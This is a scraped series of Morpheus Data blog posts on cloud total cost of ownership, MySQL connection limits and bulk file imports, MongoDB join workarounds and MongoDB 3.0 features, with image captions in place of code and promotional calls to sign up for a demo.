The most glaring shortcoming of TCO calculators is their one-size-fits-all nature. By failing to consider the unique qualities of your company – your business processes, the skill level of your staff, your existing investment in hardware, software, and facilities – the calculators present only a part of the big picture.

An even-greater challenge for organizations, according to Linthicum, is how to quantify the value of agility and faster time to market. By including these more-nebulous benefits in the TCO calculation, the most cost-effective choice may be the cloud even when a traditional hardware-software-facilities TCO analysis gives the edge to in-house systems. Linthicum recommends seven aspects to include in your “living model”:

The cost of “sidelining” the assets in your existing infrastructure
The amount of training for existing staff and hiring of new staff needed to acquire the requisite cloud skills
The cost of migrating your apps and data to the cloud, and the degree of re-engineering the migration will require
The cost of using public cloud services over an extended time, including potential changes in operational workload
The value the company places on faster time to market, faster updates for apps and data, and the ability to respond faster to changing business conditions
The savings resulting from reduced capital expenditures in the future, which often boils down to opex vs. capex
The risk of the potential failure to comply with rules and regulations governing particular industries, such as healthcare, insurance, and financial services

Boiling down the public cloud vs. private cloud equation

As tricky as it can be to get an accurate read on the total cost of public cloud services, calculating the many expenses entailed in operating a private cloud setup can leave experienced IT planners scratching their heads. In a September 9, 2014, article on ZDNet, Intel’s Ram Lakshminarayanan outlines four areas where the costs of public and private clouds differ.

While public cloud services don’t usually charge software licensing fees, their per-hour compute instance fees are likely to be higher for proprietary OSes such as Microsoft Windows than for Linux and other open-source systems. By contrast, proprietary cloud providers often apply a licensing fee for their virtualization software by the CPUs or CPU cores they require. (Use of OpenStack and other open-source private cloud software does not entail a licensing fee.)

The biggest cost difference between public and private cloud setups is in infrastructure. Private clouds require upfront expenditures for compute, network, and storage hardware, as well as ongoing costs for power, cooling, and other infrastructure. Public cloud services charge based on pro-rata, per-hour use, although their rates cover the providers’ hardware and facilities costs.

Likewise, support costs that are built into public cloud rates are a separate line item for most private clouds and must be negotiated separately in most cases. Finally, IT staff training must be considered both an upfront and continuing cost that will likely be higher for private clouds than their public counterparts, which benefit from straightforward dashboard interfaces designed for end users. A prime example is the Morpheus application management service, which features an intuitive UI for provisioning databases, apps, and app stack components on private, public, and hybrid clouds in just seconds.

Hybrid clouds in particular depend on cost management

The Goldilocks cloud solution – the one that is “just right” for a great number of small and large organizations – is the hybrid approach that mixes public and private components. This allows the companies to benefit from the public cloud’s efficiency and cost savings while protecting critical data assets in a private cloud. Accurate cost accounting is imperative to ensure both sides of the cloud equation are applied to best advantage for your firm’s data needs.

CFO’s Penny Collen writes in a March 12, 2015, column that TCO for hybrid clouds shouldn’t be approached from a project-life-cycle perspective, but rather as presenting a big-picture view of all operational costs. That’s the only way to get an accurate assessment of all your provisioning alternatives, according to Collen. She identifies four areas in which specific costs must be identified:

Hardware acquisition (asset records, purchase orders, vendor price lists)
Hardware maintenance (as a percentage of acquisition costs and maintenance averages)
Software (based on historic hardware/software ratios in your company)
Infrastructure and tech support (connectivity, facilities, disaster recovery, administration)

One-time costs include the following:

Design
Architecture
Data migration
Data porting
Data cleansing and archiving
User and technical support training
Standardization, upgrades, and customization

Categories in cloud cost accounting include servers, storage, software, labor, networking, facilities, and support. Source: CFO

Cloud-specific costs that must be part of the analysis include the following:

The need for more network capacity
Vendor fees (primarily for public cloud services)
Administration of cloud invoices
Management of relationships with cloud vendors

Last but not least, consider fees related to the cancellation terms stipulated in the cloud service’s contract. Also factor in the cost of migrating to an alternative cloud provider to avoid being squeezed by vendor lock-in.

To find out how Morpheus' PaaS solution can help you avoid cloud lock-in to save time and money, download the use case here.

↧

Too Many Connections: How to Increase the MySQL Connection Count To Avoid This Problem

April 30, 2016, 9:53 pm

≫ Next: The Fastest Way to Import Text, XML, and CSV Files into MySQL Tables

≪ Previous: How to Measure the ROI of Your Cloud Spend

Items to Consider

The available RAM – The system will need to have enough RAM to handle the additional workload.
The thread library quality of the platform - This will vary based on the platform. For example, Windows can be limited by the Posix compatibility layer it uses (though the limit no longer applies to MySQL v5.5 and up). However, there remains memoray usage concerns depending on the architecture (x86 vs. x64) and how much memory can be consumed per application process.
The required response time - Increasing the number could increase the amount of time to respond to request. This should be tested to ensure it meets your needs before going into production.
The amount of RAM used per connection - Again, RAM is important, so you will need to know if the RAM used per connection will overload the system or not.
The workload required for each connection - The workload will also factor in to what system resources are needed to handle the additional connections.

Another issue to consider is that you may also need to increase the open files limit–This may be necessary so that enough handles are available.

Checking the Connection Limit

To see what the current connection limit is, you can run the following from the MySQL command line or from many of the available MySQL tools such as phpMyAdmin:

The show variables command.

This will display a nicely formatted result for you:

Example result of the show variables command.

Increasing the Connection Limit

To increase the global number of connections temporarily, you can run the following from the command line:

An example of setting the max_connections global.

Example of setting the max_connections

The next time you restart MySQL, the new setting will take effect and will remain in place unless or until this is changed again.

Easily Scale a MySQL Database

↧

The Fastest Way to Import Text, XML, and CSV Files into MySQL Tables

April 30, 2016, 9:53 pm

≫ Next: Three Approaches to Creating a SQL-Join Equivalent in MongoDB

≪ Previous: Too Many Connections: How to Increase the MySQL Connection Count To Avoid This Problem

The basic steps entailed in importing a text file to a MySQL table are covered in a Stack Overflow post from November 2012: first, use the LOAD DATA INFILE command.

The basic MySQL commands for creating a table and importing a text file into the table. Source: Stack Overflow

Note that you may need to enable the parameter "--local-infile=1" to get the command to run. You can also specify which columns the text file loads into:

This MySQL command specifies the columns into which the text file will be imported. Source: Stack Overflow

In this example, the file's text is placed into variables "@col1, @col2, @col3," so "myid" appears in column 1, "mydecimal" appears in column 3, and column 2 has a null value.

The table resulting when LOAD DATA is run with the target column specified. Source: Stack Overflow

The fastest way to import XML files into a MySQL table

You can use a stored procedure to import XML data into a MySQL table if you specify the table structure beforehand. Source: Database Journal

The MySQL table into which the XML file will be imported has the same three fields as the file. Source: Database Journal

Gravelle's approach for overcoming MySQL's import restrictions uses the "proc-friendly" Load_File() and ExtractValue() functions.

MySQL's XML-import limitations can be overcome by using the Load_file() and ExtractValue() functions. Source: Database Journal

Benchmarking techniques for importing CSV files to MySQL tables

Crespo concludes that the fastest way to load CSV data into a MySQL table without using raw files is to use LOAD DATA syntax. Also, using parallelization for InnoDB boosts import speeds.

You can provision, deploy, and host your databases from a single dashboard. The service includes a free full replica set for each database instance, as well as automatic daily backups of MySQL, Redis databases and much more. Visit www.morpheusdata.com to sign up for a free demotoday!

Not quite ready for a demo? Watch this 2-minute intro video to see how Morpheus Data can save you time, money and sanity.

↧

Three Approaches to Creating a SQL-Join Equivalent in MongoDB

April 30, 2016, 9:53 pm

≫ Next: MongoDB 3.0 First Look: Faster, More Storage Efficient, Multi-model

≪ Previous: The Fastest Way to Import Text, XML, and CSV Files into MySQL Tables

Integrating MongoDB document data with SQL and other table-centric data sources needn't be so processor-intensive.

A tutorial in the MongoDB Manual demonstrates use of denormalization in a social-media application. The manual also provides a SQL-to-aggregation mapping chart.

Simple function for 'joining' data within a single MongoDB collection

An alternative approach to relating data in a MongoDB collection is via a function you run in the MongoDB client console. The process is explained in a Stack Overflow post from March 2014.

For example, in a library database, you first create fields for "authors", "categories", "books", and "lending".

The fields to be "joined" in the MongoDB database are "authors", "categories", "books", and "lending". Source: Stack Overflow

Then you apply the function.

Run MongoDB's find() method to retrieve related documents in a collection. Source: Stack Overflow

The result is the rough equivalent of a join operation on SQL tables.

After running the find() method the documents in the collection related as specified are returned. Source: Stack Overflow

Ensuring MongoDB apps integrate with your organization's other data

The process allows you to convert each MongoDB collection to a table. The COLUMNS and TABLES system tables are supplied by Optiq, and the ZIPS view is defined in mongo-zips-model.json.

The Optiq framework allows a MongoDB collection to be converted to a SQL-style table. Source: Julian Hyde

↧

MongoDB 3.0 First Look: Faster, More Storage Efficient, Multi-model

April 30, 2016, 9:53 pm

≫ Next: New Compilers Streamline Optimization and Enhance Code Conversion

≪ Previous: Three Approaches to Creating a SQL-Join Equivalent in MongoDB

Document-level locking and pluggable storage APIs top the list of new features in MongoDB 3.0, but the big-picture view points to a more prominent role for NoSQL databases in companies of all types and sizes. The immediate future of databases is relational, non-relational, and everything in between -- sometimes all at once.

Version 3.0 of MongoDB, the leading NoSQL database, is being touted as the first release that is truly ready for the enterprise. The new version was announced in February and shipped in early March. At least one early tester, Adam Comerford, reports that MongoDB 3.0 is indeed more efficient at managing storage, and faster at reading compressed data.

The new feature in MongoDB 3.0 gaining the lion's share of analysts' attention is the addition of the WiredTiger storage engine and pluggable API that MongoDB acquired in December 2014. JavaWorld's Andrew C. Oliver states in a February 3, 2015, article that WiredTiger will likely boost performance over MongoDB's default MMapV1 engine in apps where reads don't greatly outnumber writes.

Oliver points out that WiredTiger's B-tree and Log Structured Merge (LSM) algorithms benefit apps with large caches (B-tree) and with data that doesn't cache well (LSM). WiredTiger also promises data compression that reduces storage needs by up to 80 percent, according to the company.

mongobd-3.0-infographic

The addition of the WiredTiger storage engine is one of the new features in MongoDB 3.0 that promises to improve performance, particularly for enterprise customers. Source: Software Development Times

Other enhancements in MongoDB 3.0 include the following:

Document-level locking for concurrency control via WiredTiger
Collection-level concurrency control and more efficient journaling in MMapV1
A pluggable API for integration with in-memory, encrypted, HDFS, hardware-optimized, and other environments
The Ops Manager graphical management console in the enterprise version

Computing's John Leonard emphasizes in a February 3, 2015, article that MongoDB 3.0's multi-model functionality via the WiredTiger API positions the database to compete with DataStax' Apache Cassandra NoSQL database and Titan graph database. Leonard also highlights the new version's improved scalability.

Putting MongoDB 3.0 to the (performance) test

MongoDB 3.0's claims of improved performance were borne out by preliminary tests conducted by Adam Comerford and reported on his Adam's R&R blog in posts on February 4, 2015, and February 5, 2015. Comerford repeated compression tests with the WiredTiger storage engine in release candidate 7 (RC7) -- expected to be the last before the final version comes out in March -- that he ran originally using RC0 several months ago. The testing was done on an Ubuntu 14.10 host with an ext4 file system.

The results showed that WiredTiger's on-disk compression reduced storage to 24 percent of non-compressed storage, and to only 16 percent of the storage space used by MMapV1. Similarly, the defaults for WiredTiger with MongoDB (the WT/snappy bar below) used 50 percent of non-compressed WiredTiger and 34.7 percent of MMapV1.

Testing WiredTiger storage (compressed and non-compressed) compared to MMapV1 storage showed a tremendous advantage for the new MongoDB storage engine. Source: Adam Comerford

Comerford's tests of the benefits of compression for reads when available I/O capacity is limited demonstrated much faster performance when reading compressed data using snappy and zlib, respectively. A relatively slow external USB 3.0 drive was used to simulate "reasonable I/O constraints." The times indicate how long it took to read the entire 16GB test dataset from the on-disk testing into memory from the same disk.

Read tests from compressed and non-compressed disks in a simulated limited-storage environment indicate faster reads with WiredTiger in all scenarios. Source: Adam Comerford

All signs point to a more prominent role in organizations of all sizes for MongoDB in particular and NoSQL in general. Running relational and non-relational databases side-by-side is becoming the rule rather than the exception. The new Morpheus Virtual Appliance puts you in good position to be ready for multi-model database environments. It supports rapid provisioning and deployment of MongoDB v3.0 across public, private and hybrid clouds. Sign Up for a Demo now!

↧